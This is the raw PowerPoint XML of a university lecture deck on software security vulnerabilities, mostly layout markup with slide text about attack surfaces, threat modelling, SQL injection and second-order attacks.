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81"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId82"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="708" r:id="rId3"/>
    <p:sldId id="779" r:id="rId4"/>
    <p:sldId id="665" r:id="rId5"/>
    <p:sldId id="560" r:id="rId6"/>
    <p:sldId id="879" r:id="rId7"/>
    <p:sldId id="868" r:id="rId8"/>
    <p:sldId id="574" r:id="rId9"/>
    <p:sldId id="498" r:id="rId10"/>
    <p:sldId id="782" r:id="rId11"/>
    <p:sldId id="865" r:id="rId12"/>
    <p:sldId id="880" r:id="rId13"/>
    <p:sldId id="739" r:id="rId14"/>
    <p:sldId id="740" r:id="rId15"/>
    <p:sldId id="741" r:id="rId16"/>
    <p:sldId id="657" r:id="rId17"/>
    <p:sldId id="800" r:id="rId18"/>
    <p:sldId id="654" r:id="rId19"/>
    <p:sldId id="866" r:id="rId20"/>
    <p:sldId id="655" r:id="rId21"/>
    <p:sldId id="797" r:id="rId22"/>
    <p:sldId id="871" r:id="rId23"/>
    <p:sldId id="872" r:id="rId24"/>
    <p:sldId id="775" r:id="rId25"/>
    <p:sldId id="863" r:id="rId26"/>
    <p:sldId id="878" r:id="rId27"/>
    <p:sldId id="256" r:id="rId28"/>
    <p:sldId id="659" r:id="rId29"/>
    <p:sldId id="672" r:id="rId30"/>
    <p:sldId id="732" r:id="rId31"/>
    <p:sldId id="869" r:id="rId32"/>
    <p:sldId id="870" r:id="rId33"/>
    <p:sldId id="796" r:id="rId34"/>
    <p:sldId id="678" r:id="rId35"/>
    <p:sldId id="661" r:id="rId36"/>
    <p:sldId id="729" r:id="rId37"/>
    <p:sldId id="726" r:id="rId38"/>
    <p:sldId id="730" r:id="rId39"/>
    <p:sldId id="727" r:id="rId40"/>
    <p:sldId id="731" r:id="rId41"/>
    <p:sldId id="728" r:id="rId42"/>
    <p:sldId id="674" r:id="rId43"/>
    <p:sldId id="867" r:id="rId44"/>
    <p:sldId id="262" r:id="rId45"/>
    <p:sldId id="873" r:id="rId46"/>
    <p:sldId id="881" r:id="rId47"/>
    <p:sldId id="664" r:id="rId48"/>
    <p:sldId id="874" r:id="rId49"/>
    <p:sldId id="875" r:id="rId50"/>
    <p:sldId id="791" r:id="rId51"/>
    <p:sldId id="781" r:id="rId52"/>
    <p:sldId id="785" r:id="rId53"/>
    <p:sldId id="786" r:id="rId54"/>
    <p:sldId id="736" r:id="rId55"/>
    <p:sldId id="858" r:id="rId56"/>
    <p:sldId id="789" r:id="rId57"/>
    <p:sldId id="876" r:id="rId58"/>
    <p:sldId id="877" r:id="rId59"/>
    <p:sldId id="792" r:id="rId60"/>
    <p:sldId id="793" r:id="rId61"/>
    <p:sldId id="794" r:id="rId62"/>
    <p:sldId id="683" r:id="rId63"/>
    <p:sldId id="681" r:id="rId64"/>
    <p:sldId id="692" r:id="rId65"/>
    <p:sldId id="693" r:id="rId66"/>
    <p:sldId id="774" r:id="rId67"/>
    <p:sldId id="685" r:id="rId68"/>
    <p:sldId id="695" r:id="rId69"/>
    <p:sldId id="696" r:id="rId70"/>
    <p:sldId id="471" r:id="rId71"/>
    <p:sldId id="733" r:id="rId72"/>
    <p:sldId id="558" r:id="rId73"/>
    <p:sldId id="435" r:id="rId74"/>
    <p:sldId id="559" r:id="rId75"/>
    <p:sldId id="489" r:id="rId76"/>
    <p:sldId id="477" r:id="rId77"/>
    <p:sldId id="478" r:id="rId78"/>
    <p:sldId id="488" r:id="rId79"/>
    <p:sldId id="734" r:id="rId80"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="6858000" type="screen4x3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Poll" initials="EP" lastIdx="1" clrIdx="0">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="Erik P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0000"/>
    <a:srgbClr val="FF9900"/>
    <a:srgbClr val="008000"/>
    <a:srgbClr val="FF6600"/>
    <a:srgbClr val="33CC33"/>
    <a:srgbClr val="006600"/>
    <a:srgbClr val="66FF33"/>
    <a:srgbClr val="CC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6883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8743D8D-B383-407E-B305-F734D40BF4E7}" type="datetimeFigureOut">
              <a:rPr lang="en-GB">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>17/10/2025</a:t>
            </a:fld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E91BD8FA-2A2B-4437-B358-28625BCFC453}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›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5938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2577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27362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9B11392-17C7-43A2-9174-46EA27F88E07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96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365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589B20-7DB5-40F7-9A4B-BD018678CE33}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" smtClean="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F07040305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597525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574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98EF8-B483-4EF2-AEBC-F89AF164F1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5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49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019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AC44E-94A0-40F8-83A2-E404A3DEBCBB}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" smtClean="0"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>54</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nl-NL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7842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22D-6612-40C3-8F73-4FE84000F395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140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4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2583360" y="6247376"/>
            <a:ext cx="3803040" cy="4694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BF67-ACF3-4BC0-8580-DE31188868C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08169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ctr">
              <a:defRPr sz="1814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280" y="1977327"/>
            <a:ext cx="7771680" cy="1500638"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="254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EB0-5426-4115-B1A1-BE4B8952066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5893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1814">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr sz="1814">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr sz="1814">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr sz="1633">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr sz="1633">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:defRPr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81D-423D-4691-A409-FB2B6259717A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0737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E8B5-0B6A-439E-8DD8-4B62EB8DA477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7854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2051-0689-466F-801D-3169EFE505AB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36297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&lt;#&gt;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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18611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86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654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C230-21FF-44A4-9AAD-1C1D30A8417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590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4446-1146-492B-891B-4917982AD882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14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8673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68" y="260648"/>
            <a:ext cx="7761288" cy="1008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761288" cy="23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17033"/>
            <a:ext cx="7761288" cy="236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210F-E187-462D-9A5A-A06FF233235A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224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1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Erik Poll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Radboud University Nijmegen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218E-0481-4205-9DD0-7FB663384F66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18888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6225"/>
            <a:ext cx="7761288" cy="8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4745"/>
            <a:ext cx="7761288" cy="49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90586BA-BC27-4D33-B03C-01CAD134E49D}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" smtClean="0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0000"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:cs typeface="Times New Roman" pitchFamily="16" charset="0"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="25146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8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147801"/>
            <a:ext cx="8225280" cy="49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outline text format</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" dirty="0"/>
              <a:t>Second Outline Level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" dirty="0"/>
              <a:t>Third Outline Level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" dirty="0"/>
              <a:t>Fourth Outline Level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" dirty="0"/>
              <a:t>Fifth Outline Level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" dirty="0"/>
              <a:t>Sixth Outline Level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" dirty="0"/>
              <a:t>Seventh Outline Level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" dirty="0"/>
              <a:t>Eighth Outline Level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL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Erik Poll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23680" y="6247376"/>
            <a:ext cx="38030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4967" algn="l"/>
                <a:tab pos="891374" algn="l"/>
                <a:tab pos="1337780" algn="l"/>
                <a:tab pos="1784187" algn="l"/>
                <a:tab pos="2230593" algn="l"/>
                <a:tab pos="2677000" algn="l"/>
                <a:tab pos="3123407" algn="l"/>
                <a:tab pos="3569813" algn="l"/>
                <a:tab pos="4016220" algn="l"/>
                <a:tab pos="4462626" algn="l"/>
                <a:tab pos="4909033" algn="l"/>
                <a:tab pos="5355439" algn="l"/>
                <a:tab pos="5801846" algn="l"/>
                <a:tab pos="6248253" algn="l"/>
                <a:tab pos="6694659" algn="l"/>
                <a:tab pos="7141066" algn="l"/>
                <a:tab pos="7587472" algn="l"/>
                <a:tab pos="8033879" algn="l"/>
                <a:tab pos="8480286" algn="l"/>
                <a:tab pos="8926692" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="127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Radboud University Nijmegen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E233DDCF-2EC9-403A-8D1D-24A69B0A0E28}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" smtClean="0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921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/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1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46407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280994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695720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110446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525172" indent="-207363" algn="ctr" defTabSz="446407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4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11045" indent="-311045" algn="l" defTabSz="446407" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:lnSpc>
          <a:spcPct val="11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77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673930" indent="-259204" algn="l" defTabSz="446407" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:lnSpc>
          <a:spcPct val="11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036815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451541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1866268" indent="-207363" algn="l" defTabSz="446407" rtl="0" eaLnBrk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14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280994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46407" rtl="0" fontAlgn="base" hangingPunct="0">
        <a:lnSpc>
          <a:spcPct val="11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194217"/>
            <a:ext cx="7772400" cy="1847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/>
              <a:t>Software Security</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="3200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="3200" dirty="0"/>
              <a:t>Vulnerabilities</a:t>
            </a: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4120695"/>
            <a:ext cx="6400800" cy="1156105"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="8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800" dirty="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 err="1"/>
              <a:t>Radboud</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="2000" dirty="0"/>
              <a:t> University Nijmegen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="9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36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1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" dirty="0"/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815FA33-3B3D-0095-2061-7FAF8B7E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18" y="2600644"/>
            <a:ext cx="4602363" cy="1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4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B131-60FA-4CBD-05ED-B0EA44D3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9EB45-32F9-9D15-3FAB-150174A1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Understanding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attack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surface</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> is first step in threat modelling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sz="1800" dirty="0"/>
              <a:t>in addition to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>outer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>  attack surface, there are usually also </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>inner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>  attack surfaces deeper inside the application </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> the SQL database in case of SQLi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3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For good threat modelling you want to consider the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>architecture</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> of the application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EFD6A-2E8B-DD69-3288-4D34189260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10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" alt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EDB9978-C235-781D-4DCD-6BF563E92747}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="838200" y="428625"/>
            <a:ext cx="7761288" cy="6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r>
              <a:rPr lang="en-GB" sz="2400" kern="0" dirty="0"/>
              <a:t>Attack surface  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="A diagram of a cloud storage system&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49671B65-D894-9C3D-6B3A-90570E90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04817"/>
            <a:ext cx="4296394" cy="23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8D7A-27BF-AF8A-7F35-3935AC76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You do not have to attack just as customer...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30EF-DD11-D7CA-F2FD-E3E206AC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4F0E0-44A2-38C3-CF35-5B4E42195C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11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" alt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FCAA0-C9A7-56BA-7B5F-E37E8461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84" y="1174851"/>
            <a:ext cx="6101120" cy="50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6225"/>
            <a:ext cx="7907536" cy="845345"/>
          </a:xfrm>
        </p:spPr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Overlooked attack surfaces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052736"/>
            <a:ext cx="7761288" cy="503215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Malicious input can come from unexpected, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘trusted’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>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12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" dirty="0"/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25615" r="13767" b="24757"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1155724" y="1630621"/>
            <a:ext cx="1948142" cy="10065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939" y="1914572"/>
            <a:ext cx="2247517" cy="30661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474139"/>
            <a:ext cx="2346490" cy="234649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1718CD-729C-ED3B-6B51-0BDB6722C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-3692" r="-2513" b="-2848"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="635498" y="2827930"/>
            <a:ext cx="3756550" cy="30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Overlooked attack surfaces:  2-nd order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13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Afgeronde rechthoek 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2548845" y="1595378"/>
            <a:ext cx="2876580" cy="296602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6216245" y="1831274"/>
            <a:ext cx="1810263" cy="202005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pic>
        <p:nvPicPr>
          <p:cNvPr id="8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8" y="1862614"/>
            <a:ext cx="774968" cy="7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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1574042" y="2094206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236502" y="1798051"/>
            <a:ext cx="1517522" cy="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473172" y="2009636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5374871" y="2289907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" name="Afgeronde rechthoek 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6235661" y="3971375"/>
            <a:ext cx="1770098" cy="167648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5" name="Vrije vorm 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2616217" y="1831274"/>
            <a:ext cx="2810780" cy="691410"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 2910724"/>
              <a:gd name="connsiteY0" fmla="*/ 434521 h 785713"/>
              <a:gd name="connsiteX1" fmla="*/ 216385 w 2910724"/>
              <a:gd name="connsiteY1" fmla="*/ 448481 h 785713"/>
              <a:gd name="connsiteX2" fmla="*/ 376928 w 2910724"/>
              <a:gd name="connsiteY2" fmla="*/ 357739 h 785713"/>
              <a:gd name="connsiteX3" fmla="*/ 272226 w 2910724"/>
              <a:gd name="connsiteY3" fmla="*/ 197195 h 785713"/>
              <a:gd name="connsiteX4" fmla="*/ 369948 w 2910724"/>
              <a:gd name="connsiteY4" fmla="*/ 8731 h 785713"/>
              <a:gd name="connsiteX5" fmla="*/ 614254 w 2910724"/>
              <a:gd name="connsiteY5" fmla="*/ 57592 h 785713"/>
              <a:gd name="connsiteX6" fmla="*/ 593313 w 2910724"/>
              <a:gd name="connsiteY6" fmla="*/ 287937 h 785713"/>
              <a:gd name="connsiteX7" fmla="*/ 607273 w 2910724"/>
              <a:gd name="connsiteY7" fmla="*/ 490362 h 785713"/>
              <a:gd name="connsiteX8" fmla="*/ 746876 w 2910724"/>
              <a:gd name="connsiteY8" fmla="*/ 546203 h 785713"/>
              <a:gd name="connsiteX9" fmla="*/ 921380 w 2910724"/>
              <a:gd name="connsiteY9" fmla="*/ 392640 h 785713"/>
              <a:gd name="connsiteX10" fmla="*/ 1158705 w 2910724"/>
              <a:gd name="connsiteY10" fmla="*/ 636945 h 785713"/>
              <a:gd name="connsiteX11" fmla="*/ 1577515 w 2910724"/>
              <a:gd name="connsiteY11" fmla="*/ 427541 h 785713"/>
              <a:gd name="connsiteX12" fmla="*/ 1828800 w 2910724"/>
              <a:gd name="connsiteY12" fmla="*/ 546203 h 785713"/>
              <a:gd name="connsiteX13" fmla="*/ 2198748 w 2910724"/>
              <a:gd name="connsiteY13" fmla="*/ 643925 h 785713"/>
              <a:gd name="connsiteX14" fmla="*/ 2198748 w 2910724"/>
              <a:gd name="connsiteY14" fmla="*/ 127394 h 785713"/>
              <a:gd name="connsiteX15" fmla="*/ 2457014 w 2910724"/>
              <a:gd name="connsiteY15" fmla="*/ 57592 h 785713"/>
              <a:gd name="connsiteX16" fmla="*/ 2638498 w 2910724"/>
              <a:gd name="connsiteY16" fmla="*/ 225116 h 785713"/>
              <a:gd name="connsiteX17" fmla="*/ 2561716 w 2910724"/>
              <a:gd name="connsiteY17" fmla="*/ 420560 h 785713"/>
              <a:gd name="connsiteX18" fmla="*/ 2415133 w 2910724"/>
              <a:gd name="connsiteY18" fmla="*/ 560163 h 785713"/>
              <a:gd name="connsiteX19" fmla="*/ 2624537 w 2910724"/>
              <a:gd name="connsiteY19" fmla="*/ 762588 h 785713"/>
              <a:gd name="connsiteX20" fmla="*/ 2840922 w 2910724"/>
              <a:gd name="connsiteY20" fmla="*/ 783528 h 785713"/>
              <a:gd name="connsiteX21" fmla="*/ 2910724 w 2910724"/>
              <a:gd name="connsiteY21" fmla="*/ 783528 h 78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10724" h="785713">
                <a:moveTo>
                  <a:pt x="0" y="434521"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="76782" y="447899"/>
                  <a:pt x="153564" y="461278"/>
                  <a:pt x="216385" y="448481"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="279206" y="435684"/>
                  <a:pt x="367621" y="399620"/>
                  <a:pt x="376928" y="357739"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="386235" y="315858"/>
                  <a:pt x="273389" y="255363"/>
                  <a:pt x="272226" y="197195"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="271063" y="139027"/>
                  <a:pt x="312943" y="31998"/>
                  <a:pt x="369948" y="8731"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="426953" y="-14536"/>
                  <a:pt x="577027" y="11058"/>
                  <a:pt x="614254" y="57592"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="651482" y="104126"/>
                  <a:pt x="594477" y="215809"/>
                  <a:pt x="593313" y="287937"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="592150" y="360065"/>
                  <a:pt x="581679" y="447318"/>
                  <a:pt x="607273" y="490362"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="632867" y="533406"/>
                  <a:pt x="694525" y="562490"/>
                  <a:pt x="746876" y="546203"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="799227" y="529916"/>
                  <a:pt x="852742" y="377516"/>
                  <a:pt x="921380" y="392640"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="990018" y="407764"/>
                  <a:pt x="1049349" y="631128"/>
                  <a:pt x="1158705" y="636945"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1268061" y="642762"/>
                  <a:pt x="1465833" y="442665"/>
                  <a:pt x="1577515" y="427541"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1689198" y="412417"/>
                  <a:pt x="1725261" y="510139"/>
                  <a:pt x="1828800" y="546203"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1932339" y="582267"/>
                  <a:pt x="2137090" y="713727"/>
                  <a:pt x="2198748" y="643925"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2260406" y="574124"/>
                  <a:pt x="2155704" y="225116"/>
                  <a:pt x="2198748" y="127394"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2241792" y="29672"/>
                  <a:pt x="2383722" y="41305"/>
                  <a:pt x="2457014" y="57592"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2530306" y="73879"/>
                  <a:pt x="2621048" y="164621"/>
                  <a:pt x="2638498" y="225116"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2655948" y="285611"/>
                  <a:pt x="2598944" y="364719"/>
                  <a:pt x="2561716" y="420560"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2524489" y="476401"/>
                  <a:pt x="2404663" y="503158"/>
                  <a:pt x="2415133" y="560163"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2425603" y="617168"/>
                  <a:pt x="2553572" y="725361"/>
                  <a:pt x="2624537" y="762588"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2695502" y="799815"/>
                  <a:pt x="2793224" y="780038"/>
                  <a:pt x="2840922" y="783528"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2888620" y="787018"/>
                  <a:pt x="2899672" y="785273"/>
                  <a:pt x="2910724" y="78352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0" name="Rechthoek 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6192924" y="2339292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1" name="Rechthoek 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5334620" y="2899585"/>
            <a:ext cx="136120" cy="43261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2" name="Rechthoek 51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6175806" y="2932539"/>
            <a:ext cx="148212" cy="481558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8" name="Right Arrow 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5448037" y="2957253"/>
            <a:ext cx="717331" cy="3823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37" name="Right Arrow 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5522009" y="2381719"/>
            <a:ext cx="713652" cy="3823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3" name="Rechthoek 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5723155" y="2476788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4" name="Rechthoek 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5751273" y="3058090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7" name="Rechthoek 56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6165368" y="4390516"/>
            <a:ext cx="155505" cy="52261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Explosie 2 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="5910760" y="4494240"/>
            <a:ext cx="698614" cy="334044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6" name="Right Arrow 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="2399366">
            <a:off x="5309910" y="4055788"/>
            <a:ext cx="919167" cy="3540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8" name="Rechthoek 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="2400000">
            <a:off x="5722332" y="4191314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8" name="Vrije vorm 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3037589" y="2752630"/>
            <a:ext cx="2316188" cy="1654077"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 2316188 w 2316188"/>
              <a:gd name="connsiteY0" fmla="*/ 409379 h 2387001"/>
              <a:gd name="connsiteX1" fmla="*/ 1708915 w 2316188"/>
              <a:gd name="connsiteY1" fmla="*/ 276756 h 2387001"/>
              <a:gd name="connsiteX2" fmla="*/ 1171443 w 2316188"/>
              <a:gd name="connsiteY2" fmla="*/ 46411 h 2387001"/>
              <a:gd name="connsiteX3" fmla="*/ 431547 w 2316188"/>
              <a:gd name="connsiteY3" fmla="*/ 32451 h 2387001"/>
              <a:gd name="connsiteX4" fmla="*/ 780555 w 2316188"/>
              <a:gd name="connsiteY4" fmla="*/ 402399 h 2387001"/>
              <a:gd name="connsiteX5" fmla="*/ 1548371 w 2316188"/>
              <a:gd name="connsiteY5" fmla="*/ 597843 h 2387001"/>
              <a:gd name="connsiteX6" fmla="*/ 1443669 w 2316188"/>
              <a:gd name="connsiteY6" fmla="*/ 1051553 h 2387001"/>
              <a:gd name="connsiteX7" fmla="*/ 1297086 w 2316188"/>
